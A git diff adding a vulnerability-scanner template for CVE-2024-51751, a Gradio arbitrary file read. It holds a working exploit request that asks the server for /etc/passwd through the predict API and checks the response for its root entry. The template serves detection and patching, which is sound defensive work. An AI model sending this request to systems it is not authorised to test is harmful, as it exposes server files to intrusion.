diff --git a/code/cves/2024/CVE-2024-51751.yaml b/code/cves/2024/CVE-2024-51751.yaml new file mode 100644 index 00000000000..322fb04fdcb --- /dev/null +++ b/code/cves/2024/CVE-2024-51751.yaml @@ -0,0 +1,78 @@ +id: CVE-2024-51751 + +info: + name: Gradio File Component Arbitrary File Read + author: KoYejune0302, gy741 + severity: medium + description: | + If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-51751 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-51751 + - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248 + tags: cve, cve2024, gradio, file-read + +http: + # Pre-condition check: Ensure the server returns {"error":null} for a valid request + - raw: + - | + POST /gradio_api/run/predict HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Content-Length: 245 + + { + "data": [ + { + "path": "/tmp/safe_file.txt", + "orig_name": "safe_file.txt", + "size": 4, + "mime_type": "text/plain", + "meta": { + "_type": "gradio.FileData" + } + } + ], + "event_data": null, + "fn_index": 0, + "trigger_id": 8, + "session_hash": "mnv42s5gt7" + } + + matchers: + - type: word + words: + - '{"error":null}' + part: body + + # Vulnerability check: Attempt to read /etc/passwd without the meta field + - raw: + - | + POST /gradio_api/run/predict HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Content-Length: 215 + + { + "data": [ + { + "path": "/etc/passwd", + "orig_name": "test.txt", + "size": 4, + "mime_type": "text/plain" + } + ], + "event_data": null, + "fn_index": 0, + "trigger_id": 8, + "session_hash": "mnv42s5gt7" + } + + matchers: + - type: regex + regex: + - 'root:.*:0:0:' + part: body